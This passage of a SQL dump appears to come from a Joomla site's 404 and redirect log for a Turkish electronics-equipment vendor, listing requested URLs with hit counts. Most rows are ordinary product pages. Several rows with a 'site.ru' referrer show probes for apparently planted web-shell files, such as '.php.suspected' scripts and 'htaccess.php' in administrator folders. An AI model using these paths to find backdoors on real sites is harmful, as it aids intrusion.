00:00:00',301),(11755,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/views/languages/tmpl/htaccess.php',NULL,'http://site.ru','',2,0,'2017-11-14 13:18:01','0000-00-00 00:00:00',301),(11756,'http://3s-technologies.com.tr/tr/lsn_an.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-14 13:18:34','0000-00-00 00:00:00',301),(11757,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,mf_name/results,1-5',NULL,'','',5,0,'2017-11-14 13:31:00','0000-00-00 00:00:00',301),(11758,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-14 13:40:17','0000-00-00 00:00:00',301),(11759,'http://3s-technologies.com.tr/tr/components/com_search/models/mark.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-14 13:59:07','0000-00-00 00:00:00',301),(11760,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=36&itemid=37&lang=tr',NULL,'','',12,0,'2017-11-14 14:17:13','0000-00-00 00:00:00',301),(11761,'http://www.3s-technologies.com.tr/tr/joomla/index.php?option=com_content&view=article&id=71&itemid=79',NULL,'','',1,0,'2017-11-14 14:27:31','0000-00-00 00:00:00',301),(11762,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-14 14:33:01','0000-00-00 00:00:00',301),(11763,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_sku/results,1-10',NULL,'','',4,0,'2017-11-14 14:37:47','0000-00-00 00:00:00',301),(11764,'http://3s-technologies.com.tr/tr/administrator/components/com_categories/ofnna.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-14 14:45:43','0000-00-00 00:00:00',301),(11765,'http://3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı',NULL,'','',297,0,'2017-11-14 14:46:32','0000-00-00 00:00:00',301),(11766,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_cache/purge/htaccess.php',NULL,'http://site.ru','',1,0,'2017-11-14 14:48:59','0000-00-00 00:00:00',301),(11767,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri',NULL,'','',31,0,'2017-11-14 14:59:44','0000-00-00 00:00:00',301),(11768,'http://3s-technologies.com.tr/tr/templates/beez/index.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 15:20:29','0000-00-00 00:00:00',301),(11769,'http://3s-technologies.com.tr/tr/templates/atomic/error.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-14 15:35:43','0000-00-00 00:00:00',301),(11770,'http://3s-technologies.com.tr/tr/tmp/x.php',NULL,'http://site.ru','',3,0,'2017-11-14 15:46:02','0000-00-00 00:00:00',301),(11771,'http://3s-technologies.com.tr/tr/info.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 15:46:38','0000-00-00 00:00:00',301),(11772,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_sku/results,1-50',NULL,'','',8,0,'2017-11-14 15:49:47','0000-00-00 00:00:00',301),(11773,'http://3s-technologies.com.tr/tr/?option=com_content&view=category&id=43&itemid=2',NULL,'','',1,0,'2017-11-14 16:00:06','0000-00-00 00:00:00',301),(11774,'http://3s-technologies.com.tr/index.php/tr/ueruenler/through-hole-makineleri',NULL,'','',5,0,'2017-11-14 16:25:48','0000-00-00 00:00:00',301),(11775,'http://3s-technologies.com.tr/tr/marvins.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-14 16:28:06','0000-00-00 00:00:00',301),(11776,'http://3s-technologies.com.tr/tr/wss.php.suspected',NULL,'http://site.ru','',7,0,'2017-11-14 16:28:10','0000-00-00 00:00:00',301),(11777,'http://3s-technologies.com.tr/tr/usi.php.suspected',NULL,'http://site.ru','',3,0,'2017-11-14 16:52:56','0000-00-00 00:00:00',301),(11778,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name/results,1-10',NULL,'','',5,0,'2017-11-14 17:11:15','0000-00-00 00:00:00',301),(11779,'http://www.3s-technologies.com.tr/index.php/en/products/smd-fırın/ly-8c-detail/askquestion?tmpl=component',NULL,'','',52,0,'2017-11-14 17:31:53','0000-00-00 00:00:00',301),(11780,'http://www.3s-technologies.com.tr/tr/urunler/smd-düşük-hızlı',NULL,'','',236,0,'2017-11-14 17:36:23','0000-00-00 00:00:00',301),(11781,'http://3s-technologies.com.tr/index.php/en/products/temizleme-makineleri/trident-detail',NULL,'','',20,0,'2017-11-14 17:39:46','0000-00-00 00:00:00',301),(11782,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-14 18:06:01','0000-00-00 00:00:00',301),(11783,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc/results,1-5',NULL,'','',4,0,'2017-11-14 18:08:06','0000-00-00 00:00:00',301),(11784,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/spartan_8s_250x250.gif',NULL,'','',1,0,'2017-11-14 18:09:54','0000-00-00 00:00:00',301),(11785,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/dirdesc',NULL,'','',222,0,'2017-11-14 18:14:25','0000-00-00 00:00:00',301),(11786,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_menus/item/htaccess.php',NULL,'http://site.ru','',3,0,'2017-11-14 18:19:37','0000-00-00 00:00:00',301),(11787,'http://3s-technologies.com.tr/tr/default.php.suspected',NULL,'http://site.ru','',11,0,'2017-11-14 18:19:43','0000-00-00 00:00:00',301),(11788,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,product_name/results,1-50',NULL,'','',2,0,'2017-11-14 18:23:53','0000-00-00 00:00:00',301),(11789,'http://www.3s-technologies.com.tr/en/products/thru-hole/results,1-50',NULL,'','',4,0,'2017-11-14 18:30:12','0000-00-00 00:00:00',301),(11790,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı',NULL,'','',194,0,'2017-11-14 18:33:21','0000-00-00 00:00:00',301),(11791,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',12,0,'2017-11-14 18:39:30','0000-00-00 00:00:00',301),(11792,'http://www.3s-technologies.com.tr/en/products/manufacturer/?categorylayout=0&latest=0&productsublayout=0&recent=0&showcategory=1&showproducts=1&showsearch=1&topten=0',NULL,'','',2,0,'2017-11-14 18:48:27','0000-00-00 00:00:00',301),(11793,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/cs40-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-14 18:58:37','0000-00-00 00:00:00',301),(11794,'http://3s-technologies.com.tr/tr/authorize.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 18:59:54','0000-00-00 00:00:00',301),(11795,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,ordering',NULL,'','',10,0,'2017-11-14 19:01:47','0000-00-00 00:00:00',301),(11796,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name',NULL,'','',46,0,'2017-11-14 19:11:15','0000-00-00 00:00:00',301),(11797,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/by,ordering',NULL,'','',9,0,'2017-11-14 19:14:24','0000-00-00 00:00:00',301),(11798,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&itemid=145&lang=en',NULL,'','',11,0,'2017-11-14 19:23:55','0000-00-00 00:00:00',301),(11799,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,product_sku',NULL,'','',40,0,'2017-11-14 19:36:31','0000-00-00 00:00:00',301),(11800,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',55,0,'2017-11-14 19:39:40','0000-00-00 00:00:00',301),(11801,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',43,0,'2017-11-14 19:42:50','0000-00-00 00:00:00',301),(11802,'http://www.3s-technologies.com.tr/en/products/smd-ultra-hız/dirdesc/results,1-50',NULL,'','',1,0,'2017-11-14 19:46:00','0000-00-00 00:00:00',301),(11803,'http://3s-technologies.com.tr/tr/tplpage.php.suspected',NULL,'http://site.ru','',1,0,'2017-11-14 20:00:00','0000-00-00 00:00:00',301),(11804,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku',NULL,'','',2,0,'2017-11-14 20:04:56','0000-00-00 00:00:00',301),(11805,'http://3s-technologies.com.tr/tr/administrator/templates/hathor/html/com_modules/positions/htaccess.php',NULL,'http://site.ru','',4,0,'2017-11-14 20:24:55','0000-00-00 00:00:00',301),(11806,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,product_name',NULL,'','',38,0,'2017-11-14 20:33:21','0000-00-00 00:00:00',301),(11807,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim',NULL,'','',27,0,'2017-11-14 20:36:30','0000-00-00 00:00:00',301),(11808,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/dalga-lehim/dirdesc',NULL,'','',4,0,'2017-11-14 20:39:40','0000-00-00 00:00:00',301),(11809,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın',NULL,'','',93,0,'2017-11-14 20:55:27','0000-00-00 00:00:00',301),(11810,'http://www.3s-technologies.com.tr/en/products/smd-fırın/results,1-10',NULL,'','',6,0,'2017-11-14 21:01:46','0000-00-00 00:00:00',301),(11811,'http://3s-technologies.com.tr/tr/htaccess.php.suspected',NULL,'http://site.ru','',5,0,'2017-11-14 21:05:41','0000-00-00 00:00:00',301),(11812,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-detail',NULL,'','',24,0,'2017-11-14 21:10:08','0000-00-00 00:00:00',301),(11813,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-14 21:11:15','0000-00-00 00:00:00',301),(11814,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,ordering?language=tr-tr',NULL,'','',27,0,'2017-11-14 21:12:10','0000-00-00 00:00:00',301),(11815,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/results,1-50',NULL,'','',5,0,'2017-11-14 21:14:24','0000-00-00 00:00:00',301),(11816,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/virtuemart/product/resized/ls60v_250x250.gif',NULL,'','',1,0,'2017-11-14 21:18:04','0000-00-00 00:00:00',301),(11817,'http://www.3s-technologies.com.tr/tr/urunler/smd-fırın/by,category_name/results,1-5',NULL,'','',7,0,'2017-11-14 21:39:40','0000-00-00 00:00:00',301),(11818,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/results,1-10',NULL,'','',1,0,'2017-11-14 21:49:08','0000-00-00 00:00:00',301),(11819,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,category_name',NULL,'','',40,0,'2017-11-14 21:52:18','0000-00-00 00:00:00',301),(11820,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/dirdesc',NULL,'','',181,0,'2017-11-14 22:01:46','0000-00-00 00:00:00',301),(11821,'http://3s-technologies.com.tr/index.php/en/products/lfs-1-detail?tmpl=component&print=1',NULL,'','',10,0,'2017-11-14 22:20:31','0000-00-00 00:00:00',301),(11822,'http://www.3s-technologies.com.tr/tr/urunler/lfs-1-detail?tmpl=component&print=1',NULL,'','',40,0,'2017-11-14 22:22:52','0000-00-00 00:00:00',301),(11823,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku',NULL,'','',7,0,'2017-11-14 22:27:02','0000-00-00 00:00:00',301),(11824,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-fırın/by,category_name?language=tr-tr',NULL,'','',2,0,'2017-11-14 22:47:07','0000-00-00 00:00:00',301),(11825,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-14 22:49:41','0000-00-00 00:00:00',301),(11826,'http://www.3s-technologies.com.tr/en/products/thru-hole/by,ordering',NULL,'','',2,0,'2017-11-14 22:58:36','0000-00-00 00:00:00',301),(11827,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/dalga-lehim/by,category_name',NULL,'','',8,0,'2017-11-14 23:00:44','0000-00-00 00:00:00',301),(11828,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/dirdesc',NULL,'','',8,0,'2017-11-14 23:01:24','0000-00-00 00:00:00',301),(11829,'http://3s-technologies.com.tr/tr/urunler/konveyorler/by,product_name',NULL,'','',17,0,'2017-11-14 23:01:46','0000-00-00 00:00:00',301),(11830,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name',NULL,'','',17,0,'2017-11-14 23:03:00','0000-00-00 00:00:00',301),(11831,'http://3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name',NULL,'','',8,0,'2017-11-14 23:03:08','0000-00-00 00:00:00',301),(11832,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/by,mf_name',NULL,'','',7,0,'2017-11-14 23:04:30','0000-00-00 00:00:00',301),(11833,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/smd-orta-hızlı/by,category_name',NULL,'','',180,0,'2017-11-14 23:04:55','0000-00-00 00:00:00',301),(11834,'http://3s-technologies.com.tr/tr/urunler/dalga-lehim/dirdesc',NULL,'','',14,0,'2017-11-14 23:05:05','0000-00-00 00:00:00',301),(11835,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/lfs-1-detail',NULL,'','',9,0,'2017-11-14 23:06:05','0000-00-00 00:00:00',301),(11836,'http://3s-technologies.com.tr/tr/urunler/konveyorler/dirdesc',NULL,'','',20,0,'2017-11-14 23:06:08','0000-00-00 00:00:00',301),(11837,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,category_name',NULL,'','',24,0,'2017-11-14 23:07:02','0000-00-00 00:00:00',301),(11838,'http://3s-technologies.com.tr/tr/js.php.suspected',NULL,'http://site.ru','',4,0,'2017-11-14 23:32:27','0000-00-00 00:00:00',301),(11839,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name',NULL,'','',4,0,'2017-11-14 23:39:40','0000-00-00 00:00:00',301),(11840,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/dirdesc',NULL,'','',41,0,'2017-11-14 23:42:49','0000-00-00 00:00:00',301),(11841,'http://3s-technologies.com.tr/tr/urunler/konveyorler/by,product_sku',NULL,'','',20,0,'2017-11-14 23:52:48','0000-00-00 00:00:00',301),(11842,'http://3s-technologies.com.tr/tr/urunler/jv131-detail?tmpl=component&print=1',NULL,'','',9,0,'2017-11-14 23:55:10','0000-00-00 00:00:00',301),(11843,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,product_name?language=en-gb',NULL,'','',2,0,'2017-11-15 00:01:04','0000-00-00 00:00:00',301),(11844,'http://3s-technologies.com.tr/en/products/konveyorler/by,product_sku',NULL,'','',8,0,'2017-11-15 00:07:12','0000-00-00 00:00:00',301),(11845,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/cm-602-l-detail?tmpl=component&print=1',NULL,'','',28,0,'2017-11-15 00:09:38','0000-00-00 00:00:00',301),(11846,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/kopyası-gf-12ht_250x250.gif',NULL,'','',1,0,'2017-11-15 00:11:45','0000-00-00 00:00:00',301),(11847,'http://www.3s-technologies.com.tr/tr/urunler/rh6-detail?tmpl=component&print=1',NULL,'','',35,0,'2017-11-15 00:23:19','0000-00-00 00:00:00',301),(11848,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',8,0,'2017-11-15 00:33:05','0000-00-00 00:00:00',301),(11849,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,mf_name/dirdesc',NULL,'','',1,0,'2017-11-15 00:33:20','0000-00-00 00:00:00',301),(11850,'http://www.3s-technologies.com.tr/en/products/thru-hole/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-15 00:36:30','0000-00-00 00:00:00',301),(11851,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/mx200_250x250.jpg',NULL,'','',5,0,'2017-11-15 00:40:43','0000-00-00 00:00:00',301),(11852,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/sp18_250x250.jpg',NULL,'','',3,0,'2017-11-15 00:45:46','0000-00-00 00:00:00',301),(11853,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/lfs-1-detail',NULL,'','',1,0,'2017-11-15 00:58:36','0000-00-00 00:00:00',301),(11854,'http://www.3s-technologies.com.tr/index.php/en/products/screen-printer/asp-300-detail/askquestion?tmpl=component',NULL,'','',27,0,'2017-11-15 01:15:05','0000-00-00 00:00:00',301),(11855,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/av132-detail',NULL,'','',47,0,'2017-11-15 01:18:18','0000-00-00 00:00:00',301),(11856,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/dirdesc/results,1-5',NULL,'','',5,0,'2017-11-15 01:23:52','0000-00-00 00:00:00',301),(11857,'http://www.3s-technologies.com.tr/en/products/thru-hole/dirdesc/results,1-50',NULL,'','',4,0,'2017-11-15 01:33:21','0000-00-00 00:00:00',301),(11858,'http://www.3s-technologies.com.tr/index.php/en/products/flux/by,category_name?language=en-gb',NULL,'','',24,0,'2017-11-15 01:56:28','0000-00-00 00:00:00',301),(11859,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/lfs-1-detail',NULL,'','',6,0,'2017-11-15 02:08:04','0000-00-00 00:00:00',301),(11860,'http://www.3s-technologies.com.tr/en/home2/81-english-uk/english-content?format=feed&type=rss',NULL,'','',3,0,'2017-11-15 02:15:38','0000-00-00 00:00:00',301),(11861,'http://3s-technologies.com.tr/index.php/en/products/mi-300-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-15 02:25:43','0000-00-00 00:00:00',301),(11862,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc?language=en-gb',NULL,'','',9,0,'2017-11-15 02:25:47','0000-00-00 00:00:00',301),(11863,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&itemid=92&lang=tr',NULL,'','',21,0,'2017-11-15 02:33:20','0000-00-00 00:00:00',301),(11864,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name/results,1-5',NULL,'','',5,0,'2017-11-15 02:42:48','0000-00-00 00:00:00',301),(11865,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_asp-300_250x250.jpg',NULL,'','',2,0,'2017-11-15 02:47:37','0000-00-00 00:00:00',301),(11866,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lfs-1-detail?tmpl=component&print=1',NULL,'','',5,0,'2017-11-15 02:58:06','0000-00-00 00:00:00',301),(11867,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/ls60v-detail?tmpl=component&print=1',NULL,'','',12,0,'2017-11-15 03:04:23','0000-00-00 00:00:00',301),(11868,'http://3s-technologies.com.tr/index.php/en/products/le-40v-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-11-15 03:09:21','0000-00-00 00:00:00',301),(11869,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/by,mf_name/results,1-5',NULL,'','',4,0,'2017-11-15 03:18:19','0000-00-00 00:00:00',301),(11870,'http://www.3s-technologies.com.tr/en/products/thru-hole/dirdesc/results,1-10',NULL,'','',4,0,'2017-11-15 03:22:22','0000-00-00 00:00:00',301),(11871,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc?language=en-gb',NULL,'','',15,0,'2017-11-15 03:41:25','0000-00-00 00:00:00',301),(11872,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-detail',NULL,'','',19,0,'2017-11-15 04:16:38','0000-00-00 00:00:00',301),(11873,'http://www.3s-technologies.com.tr/en/products/bölgesel-lehimleme/by,mf_name/results,1-10',NULL,'','',4,0,'2017-11-15 04:23:02','0000-00-00 00:00:00',301),(11874,'http://3s-technologies.com.tr/tr/mrswenvsr.php.suspected',NULL,'http://site.ru','',2,0,'2017-11-15 04:27:01','0000-00-00 00:00:00',301),(11875,'http://3s-technologies.com.tr/tr/urunler/trident-detail?tmpl=component&print=1',NULL,'','',17,0,'2017-11-15 04:47:20','0000-00-00 00:00:00',301),(11876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/dirdesc',NULL,'','',7,0,'2017-11-15 04:55:24','0000-00-00 00:00:00',301),(11877,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/avb-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-15 05:00:34','0000-00-00 00:00:00',301),(11878,'http://3s-technologies.com.tr/tr/urunler/mi-300-detail?tmpl=component&print=1',NULL,'','',20,0,'2017-11-15 05:06:58','0000-00-00 00:00:00',301),(11879,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name',NULL,'','',42,0,'2017-11-15 05:09:31','0000-00-00 00:00:00',301),(11880,'https://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/av132_250x250.jpg',NULL,'','',1,0,'2017-11-15 06:14:42','0000-00-00 00:00:00',301),(11881,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim?language=tr-tr',NULL,'','',29,0,'2017-11-15 06:16:17','0000-00-00 00:00:00',301),(11882,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,product_name',NULL,'','',20,0,'2017-11-15 06:43:25','0000-00-00 00:00:00',301),(11883,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/rl132-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-15 06:54:26','0000-00-00 00:00:00',301),(11884,'http://3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',17,0,'2017-11-15 06:56:43','0000-00-00 00:00:00',301),(11885,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',410,0,'2017-11-15 07:02:59','0000-00-00 00:00:00',301),(11886,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,mf_name',NULL,'','',2,0,'2017-11-15 07:04:50','0000-00-00 00:00:00',301),(11887,'http://www.3s-technologies.com.tr/en/products/temizleme-makineleri/results,1-10',NULL,'','',2,0,'2017-11-15 07:21:00','0000-00-00 00:00:00',301),(11888,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,product_sku',NULL,'','',37,0,'2017-11-15 07:22:08','0000-00-00 00:00:00',301),(11889,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,mf_name',NULL,'','',42,0,'2017-11-15 07:28:50','0000-00-00 00:00:00',301),(11890,'http://3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-detail',NULL,'','',9,0,'2017-11-15 08:01:46','0000-00-00 00:00:00',301),(11891,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,product_sku?error=404&language=en-gb',NULL,'','',2,0,'2017-11-15 08:02:26','0000-00-00 00:00:00',301),(11892,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim',NULL,'','',32,0,'2017-11-15 08:07:46','0000-00-00 00:00:00',301),(11893,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_all_250x250.png',NULL,'','',6,0,'2017-11-15 08:16:59','0000-00-00 00:00:00',301),(11894,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,mf_name',NULL,'','',38,0,'2017-11-15 08:19:09','0000-00-00 00:00:00',301),(11895,'http://www.3s-technologies.com.tr/index.php/en/products/ess-310-detail?tmpl=component&print=1',NULL,'','',26,0,'2017-11-15 08:19:23','0000-00-00 00:00:00',301),(11896,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,ordering?language=en-gb',NULL,'','',8,0,'2017-11-15 08:41:46','0000-00-00 00:00:00',301),(11897,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/results,1-10',NULL,'','',6,0,'2017-11-15 08:54:02','0000-00-00 00:00:00',301),(11898,'http://3s-technologies.com.tr/index.php/en/products/spr-20-41-detail?tmpl=component&print=1',NULL,'','',14,0,'2017-11-15 08:54:42','0000-00-00 00:00:00',301),(11899,'http://3s-technologies.com.tr/index.php/en/products/screen-printer/by,`p`.product_sku?language=en-gb',NULL,'','',8,0,'2017-11-15 09:03:35','0000-00-00 00:00:00',301),(11900,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,category_name/dirdesc?language=tr-tr',NULL,'','',2,0,'2017-11-15 09:05:55','0000-00-00 00:00:00',301),(11901,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/results,1-50',NULL,'','',6,0,'2017-11-15 09:18:18','0000-00-00 00:00:00',301),(11902,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/results,1-10',NULL,'','',18,0,'2017-11-15 09:30:27','0000-00-00 00:00:00',301),(11903,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/dalga-lehim/by,ordering',NULL,'','',6,0,'2017-11-15 09:38:32','0000-00-00 00:00:00',301),(11904,'http://3s-technologies.com.tr/tr/urunler/rl132-detail?tmpl=component&print=1',NULL,'','',19,0,'2017-11-15 10:12:26','0000-00-00 00:00:00',301),(11905,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by?language=en-gb&product_name/dirdesc',NULL,'','',1,0,'2017-11-15 10:16:01','0000-00-00 00:00:00',301),(11906,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku',NULL,'','',17,0,'2017-11-15 10:20:23','0000-00-00 00:00:00',301),(11907,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-ultra-hız/by?language=en-gb&product_name',NULL,'','',3,0,'2017-11-15 10:24:42','0000-00-00 00:00:00',301),(11908,'http://3s-technologies.com.tr/tr/urunler/manufacturers/aqueous',NULL,'','',53,0,'2017-11-15 11:27:45','0000-00-00 00:00:00',301),(11909,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/smd-fırın/by,`p`.product_sku?language=tr-tr',NULL,'','',2,0,'2017-11-15 11:39:30','0000-00-00 00:00:00',301),(11910,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/tel-lehim/results,1-40',NULL,'','',19,0,'2017-11-15 11:43:55','0000-00-00 00:00:00',301),(11911,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/t_mi300_250x250.jpg',NULL,'','',4,0,'2017-11-15 11:45:05','0000-00-00 00:00:00',301),(11912,'http://3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/çubuk-lehim/by,`p`.product_sku?language=en-gb',NULL,'','',3,0,'2017-11-15 11:51:44','0000-00-00 00:00:00',301),(11913,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/rl132-detail',NULL,'','',1,0,'2017-11-15 12:04:15','0000-00-00 00:00:00',301),(11914,'http://www.3s-technologies.com.tr/en/products/2.-el-makineler/by,product_sku',NULL,'','',43,0,'2017-11-15 12:15:00','0000-00-00 00:00:00',301),(11915,'http://3s-technologies.com.tr/tr/urunler/mx200lp-3-detail?tmpl=component&print=1',NULL,'','',13,0,'2017-11-15 12:31:12','0000-00-00 00:00:00',301),(11916,'http://3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-20-detail',NULL,'','',10,0,'2017-11-15 12:32:34','0000-00-00 00:00:00',301),(11917,'http://3s-technologies.com.tr/tr/urunler/manufacturer/tolo/screen-printer/dirdesc',NULL,'','',14,0,'2017-11-15 12:52:48','0000-00-00 00:00:00',301),(11918,'http://3s-technologies.com.tr/index.php/en/products/2.-el-makineler/avf-detail',NULL,'','',11,0,'2017-11-15 12:57:09','0000-00-00 00:00:00',301),(11919,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/trident_full_view_250x250.jpg',NULL,'','',9,0,'2017-11-15 13:21:59','0000-00-00 00:00:00',301),(11920,'http://3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',15,0,'2017-11-15 13:50:46','0000-00-00 00:00:00',301),(11921,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/2.-el-makineler/avb-detail',NULL,'','',1,0,'2017-11-15 14:07:13','0000-00-00 00:00:00',301),(11922,'http://3s-technologies.com.tr/index.php/en/products/smd-orta-hızlı/am100-detail',NULL,'','',177,0,'2017-11-15 14:16:52','0000-00-00 